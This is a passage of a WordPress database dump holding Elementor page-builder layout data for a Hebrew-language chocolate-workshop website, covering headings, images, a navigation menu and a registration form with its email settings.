\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6478920\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#2d2d2d\"},\"elements\":[{\"id\":\"1db1127\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c5bd98f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05dc \\u05d4\\u05d6\\u05db\\u05d5\\u05d9\\u05d5\\u05ea \\u05e9\\u05de\\u05d5\\u05e8\\u05d5\\u05ea 2018 (c) - \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3<\\/p>\",\"text_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"88ba40c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e3f463b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: left;\\\">\\u05e9\\u05de\\u05d5\\u05dc: <span style=\\\"color: #ff9900;\\\"><a style=\\\"color: #ff9900;\\\" href=\\\"https:\\/\\/www.shmul.co.il\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">\\u05e7\\u05d9\\u05d3\\u05d5\\u05dd \\u05d0\\u05ea\\u05e8\\u05d9\\u05dd \\u05d0\\u05d5\\u05e8\\u05d2\\u05e0\\u05d9<\\/a><\\/span><\\/p>\",\"text_color\":\"#fcfcfc\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(923,188,'_elementor_version','0.4'),(925,189,'_wp_page_template','elementor_canvas'),(926,189,'_elementor_edit_mode','builder'),(927,189,'_elementor_template_type','post'),(928,189,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements